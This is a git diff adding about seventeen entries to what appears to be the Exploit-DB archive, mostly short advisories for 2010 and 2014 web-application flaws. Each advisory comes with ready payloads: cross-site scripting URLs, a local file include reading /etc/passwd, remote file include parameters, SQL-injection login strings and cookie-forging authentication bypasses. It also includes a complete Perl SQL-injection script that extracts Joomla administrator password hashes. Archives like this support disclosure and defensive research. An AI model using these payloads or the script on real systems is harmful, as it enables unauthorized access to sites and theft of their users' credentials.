diff --git a/files.csv b/files.csv
index f1610308f..d085e52fd 100755
--- a/files.csv
+++ b/files.csv
@@ -30335,3 +30335,20 @@ id,file,description,date,author,platform,type,port
33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection Vulnerability",2010-02-19,"Sjoerd Resink",multiple,remote,0
33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0
33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0
+33667,platforms/php/webapps/33667.txt,"Wordpress Theme Elegance - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
+33668,platforms/php/webapps/33668.txt,"Wordpress Theme Infocus - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
+33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
+33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0
+33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0
+33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0
+33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 Insecure Cookie Authentication Bypass Vulnerability",2010-02-25,JIKO,php,webapps,0
+33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 'wflogin.jsp' Cross Site Scripting Vulnerability",2010-02-26,"Yaniv Miron",jsp,webapps,0
+33679,platforms/php/webapps/33679.txt,"TRUC 0.11 'login_reset_password_page.php' Cross Site Scripting Vulnerability",2010-02-28,snakespc,php,webapps,0
+33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities",2010-02-28,"cr4wl3r ",php,webapps,0
+33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 Installation Script Unauthorized Access Vulnerability",2010-02-27,indoushka,php,webapps,0
+33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 'loyalty_enu/start.swe' Cross Site Scripting Vulnerability",2010-03-01,Lament,multiple,remote,0
+33683,platforms/php/webapps/33683.txt,"Article Friendly 'filename' Parameter Local File Include Vulnerability",2010-03-01,"pratul agrawal",php,webapps,0
+33684,platforms/php/webapps/33684.txt,"Blax Blog 0.1 'girisyap.php' SQL Injection Vulnerability",2010-03-01,"cr4wl3r ",php,webapps,0
+33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 '_SESSION[dede_admin_id]' Parameter Authentication Bypass Vulnerability",2010-03-01,"Wolves Security Team",php,webapps,0
+33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 'readme.nsf' Cross Site Scripting Vulnerability",2010-03-02,"Nahuel Grisolia",multiple,remote,0
+33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQMS Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0
diff --git a/platforms/java/webapps/33687.txt b/platforms/java/webapps/33687.txt
new file mode 100755
index 000000000..aa2f688f6
--- /dev/null
+++ b/platforms/java/webapps/33687.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38483/info
+
+Sparta Systems TrackWise EQMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+
+http://www.example.com/[TrackWiseDir]/servlet/TeamAccess/Login/">
+http://www.example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.html/">
diff --git a/platforms/jsp/webapps/33675.txt b/platforms/jsp/webapps/33675.txt
new file mode 100755
index 000000000..3193cd6ce
--- /dev/null
+++ b/platforms/jsp/webapps/33675.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38412/info
+
+Multiple IBM products are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects IBM Lotus Web Content Management, WebSphere Portal, and Lotus Quickr.
+
+
+http://www.example.com/wps/wcm/webinterface/login/login.jsp?";>
\ No newline at end of file
diff --git a/platforms/multiple/remote/33686.txt b/platforms/multiple/remote/33686.txt
new file mode 100755
index 000000000..b0a28b8af
--- /dev/null
+++ b/platforms/multiple/remote/33686.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38481/info
+
+IBM Lotus Domino is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Lotus Domino 7.0.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/help/readme.nsf/Header?OpenPage=&BaseTarget=%22;//%20--%3E%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/33667.txt b/platforms/php/webapps/33667.txt
new file mode 100755
index 000000000..6972df936
--- /dev/null
+++ b/platforms/php/webapps/33667.txt
@@ -0,0 +1,24 @@
+[+] Post Local File Disclosure in wordpress theme Elegance
+[+] Date: 07/06/2014
+[+] CWE Number: CWE-98
+[+] Risk: High
+[+] Author: Felipe Andrian Peixoto
+[+] Dork:inurl:"/wp-content/themes/elegance/"
+[+] Vendor Homepage: http://www.elegantthemes.com/
+[+] Contact: felipe_andrian@hotmail.com
+[+] Tested on: Windows 7 and Linux
+[+] Vulnerable File: dl-skin.php
+
+[+] Exploit :
+
+
+
+
+
+
+
+
+eof
\ No newline at end of file
diff --git a/platforms/php/webapps/33668.txt b/platforms/php/webapps/33668.txt
new file mode 100755
index 000000000..16551e6a1
--- /dev/null
+++ b/platforms/php/webapps/33668.txt
@@ -0,0 +1,32 @@
+[+] Post Local File Disclosure in wordpress theme Infocus
+
+[+] Date: 07/06/2014
+
+[+] CWE Number: CWE-98
+
+[+] Risk: High
+
+[+] Author: Felipe Andrian Peixoto
+
+[+] Dork:inurl:"/wp-content/themes/infocus/"
+
+[+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486
+
+[+] Contact: felipe_andrian@hotmail.com
+
+[+] Tested on: Windows 7 and Linux
+
+[+] Vulnerable File: dl-skin.php
+
+[+] Exploit :
+
+
+
+
+
+
+
+eof
\ No newline at end of file
diff --git a/platforms/php/webapps/33671.txt b/platforms/php/webapps/33671.txt
new file mode 100755
index 000000000..935cbbf93
--- /dev/null
+++ b/platforms/php/webapps/33671.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/38385/info
+
+MySmartBB is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The issues affect MySmartBB 1.7.0; other versions may also be affected.
+
+http://www.example.com/MySBB/misc.php/>'>
+http://www.example.com/MySBB/index.php/>'>
+http://www.example.com/memberlist.php/>'>
+http://www.example.com/MySBB/new.php/>'>
+http://www.example.com/MySBB/pm.php/>'>
+http://www.example.com/MySBB/register.php/>'>
+http://www.example.com/MySBB/search.php/>'>
\ No newline at end of file
diff --git a/platforms/php/webapps/33673.pl b/platforms/php/webapps/33673.pl
new file mode 100755
index 000000000..ace18677f
--- /dev/null
+++ b/platforms/php/webapps/33673.pl
@@ -0,0 +1,68 @@
+source: http://www.securityfocus.com/bid/38401/info
+
+The HD FLV Player component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+#!/usr/bin/perl -w
+
+###############################################################################################
+#
+# [~] Joomla Component com_hdflvplayer SQL injection exploit - (id)
+# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
+# [~] Homepage : http://www.indonesiancoder.com
+# [~] Date : 15 February, 2010
+#
+###############################################################################################
+#
+# [ Software Information ]
+#
+# [+] Vendor : http://www.hdflvplayer.net/
+# [+] Price : $ 99.00
+# [+] Vulnerability : SQL injection
+# [+] Dork : inurl:"CIHUY"
+# [+] Type : commercial
+#
+###############################################################################################
+#
+# USAGE : perl kaMz.pl
+#
+###############################################################################################
+
+print "\t\t[!]=========================================================[!]\n\n";
+print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
+print "\t\t[!]=========================================================[!]\n\n";
+print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
+print "\t\t [~] by kaMtiEz [~] \n\n";
+print "\t\t[!]=========================================================[!]\n\n";
+
+use LWP::UserAgent;
+
+print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
+chomp(my $IBL13Z=);
+
+$kaMtiEz="concat(username,0x3a,password)";
+$tukulesto="jos_users";
+$pathloader="com_hdflvplayer";
+
+$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
+$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
+$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
+print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
+}
+else{print "\n[+] Exploit GAGAL GAN ![+]\n";
+}
+
+##############################################################################################
+#
+# GREETZZZZZ :
+#
+# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
+# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
+# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
+# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
+#
+##############################################################################################
diff --git a/platforms/php/webapps/33674.txt b/platforms/php/webapps/33674.txt
new file mode 100755
index 000000000..b906e1037
--- /dev/null
+++ b/platforms/php/webapps/33674.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/38402/info
+
+OpenInferno OI.Blogs is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also be affected.
+
+The following example URIs are available:
+
+http://www.example.com/templates/loadStyles.php?theme=file%00
+http://www.example.com/sources/javascript/loadScripts.php?scripts=[file]%00
+
+The following example data is available:
+
+javascript:document.cookie="installerFile=[FIle];path='/upload/admin/plugins'
\ No newline at end of file
diff --git a/platforms/php/webapps/33676.txt b/platforms/php/webapps/33676.txt
new file mode 100755
index 000000000..f13ea371e
--- /dev/null
+++ b/platforms/php/webapps/33676.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38421/info
+
+Newbie CMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
+
+Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
+
+Versions prior to Newbie CMS 0.03 are vulnerable; other versions may also be affected.
+
+Supplying the following cookie data is sufficient to exploit this issue:
+
+javascript:document.cookie="nb_logged=jiko;path=/newbb/admin/";
\ No newline at end of file
diff --git a/platforms/php/webapps/33679.txt b/platforms/php/webapps/33679.txt
new file mode 100755
index 000000000..caa4f1461
--- /dev/null
+++ b/platforms/php/webapps/33679.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/38445/info
+
+TRUC is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+TRUC 0.11.0 is vulnerable; other versions may also be affected.
+
+
+http://www.example.com/truc/login_reset_password_page.php?failed=true&error=">
\ No newline at end of file
diff --git a/platforms/php/webapps/33680.txt b/platforms/php/webapps/33680.txt
new file mode 100755
index 000000000..0b40ccbba
--- /dev/null
+++ b/platforms/php/webapps/33680.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38449/info
+
+Open Educational System is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
+
+Open Educational System 0.1 beta and prior versions are vulnerable.
+
+http://www.example.com/[path]/admin/modules/modules/forum/admin.php?CONF_INCLUDE_PATH=attacker's site
+http://www.example.com/[path]/admin/modules/modules/plotgraph/index.php?CONF_INCLUDE_PATH=attacker's site
+http://www.example.com/[path]/admin/modules/user_account/admin_user/mod_admuser.php?CONF_INCLUDE_PATH=attacker's site
+http://www.example.com/[path]/admin/modules/user_account/ogroup/mod_group.php?CONF_INCLUDE_PATH=attacker's site
\ No newline at end of file
diff --git a/platforms/php/webapps/33681.txt b/platforms/php/webapps/33681.txt
new file mode 100755
index 000000000..b63bf7f16
--- /dev/null
+++ b/platforms/php/webapps/33681.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38453/info
+
+SLAED CMS is prone to an unauthorized-access vulnerability.
+
+Attackers can exploit this issue to obtain unauthorized access to installation scripts.
+
+SLAED CMS 4 is vulnerable; other versions may also be affected.
+
+The following example URIs are available:
+
+http://www.example.com/sd/setup.php?op=language&lang=1
+
+http://www.example.com/sd/install/index.php?op=language&lang=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33683.txt b/platforms/php/webapps/33683.txt
new file mode 100755
index 000000000..ab490bd04
--- /dev/null
+++ b/platforms/php/webapps/33683.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38461/info
+
+Article Friendly is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+Article Friendly Pro is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/index.php?filename=../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/33684.txt b/platforms/php/webapps/33684.txt
new file mode 100755
index 000000000..dc12abdf9
--- /dev/null
+++ b/platforms/php/webapps/33684.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38465/info
+
+Blax Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Blax Blog 0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/girisyap.php
+
+Username: ' or '1=1
+password: ' or '1=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33685.html b/platforms/php/webapps/33685.html
new file mode 100755
index 000000000..55715120a
--- /dev/null
+++ b/platforms/php/webapps/33685.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38469/info
+
+DeDeCMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input.
+
+Attackers can exploit this issue to gain unauthorized access to the affected application.
+
+DeDeCMS GBK 5.5 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file